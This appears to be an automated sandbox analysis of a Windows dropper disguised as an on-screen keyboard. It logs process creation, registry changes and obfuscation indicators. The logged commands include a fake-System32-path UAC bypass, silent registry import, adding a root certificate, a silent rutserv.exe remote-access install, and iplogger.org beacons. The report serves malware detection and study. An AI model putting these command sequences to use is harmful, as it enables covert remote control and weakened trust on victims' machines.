Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Process created: C:\ProgramData\pass.exe C:\ProgramData\pass.exe
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Source: C:\ProgramData\pass.exe	Process created: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp 'C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp' /SL5='$10584,9506241,724480,C:\ProgramData\pass.exe'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'regedit /s C:\ProgramData\Immunity\ses.reg'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\Immunity\install.cmd''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Process created: C:\ProgramData\pass.exe C:\ProgramData\pass.exe
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: 1wOdXavtlE.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1wOdXavtlE.exe

Static file information: File size 1285632 > 1048576

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: 1wOdXavtlE.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source:	Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)

.NET source code contains potential unpacker

Show sources

Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: is-PFD3D.tmp.19.dr	Static PE information: real checksum: 0xc2cd should be: 0x193fb
Source: 1wOdXavtlE.exe	Static PE information: real checksum: 0x0 should be: 0x13dc3c
Source: servs.tmp.17.dr	Static PE information: real checksum: 0x0 should be: 0x271505
Source: is-R3F67.tmp.19.dr	Static PE information: real checksum: 0x0 should be: 0x9c1fa0

Source: servs.tmp.17.dr	Static PE information: section name: .didata
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: .xdata
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /4
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /19
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /31
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /45
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /57
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /70
Source: is-R3F67.tmp.19.dr	Static PE information: section name: .didata

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4CA14 push esp; retn 0278h
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0400 push ecx; ret
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC65A0 pushfd ; retf
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A7000 push 004A70DEh; ret
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A7980 push 004A7A43h; ret
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0043007C push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004990DC push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045608C push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00430094 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00498140 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045A16C push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045410C push 00454162h; ret
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004251C8 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0041A1D4 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00459260 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00430214 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00494220 push 004942FFh; ret
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004223E4 push 004224E8h; ret
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458380 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458390 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004953AC push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00493450 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458464 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00499470 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00457420 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004544AC push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0048D544 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00429520 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045A520 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004595B4 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00498604 push ecx; mov dword ptr [esp], edx

Source: initial sample

Static PE information: section name: .text entropy: 7.52934612956

Source: 1wOdXavtlE.exe, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 1wOdXavtlE.exe, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 1wOdXavtlE.exe, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
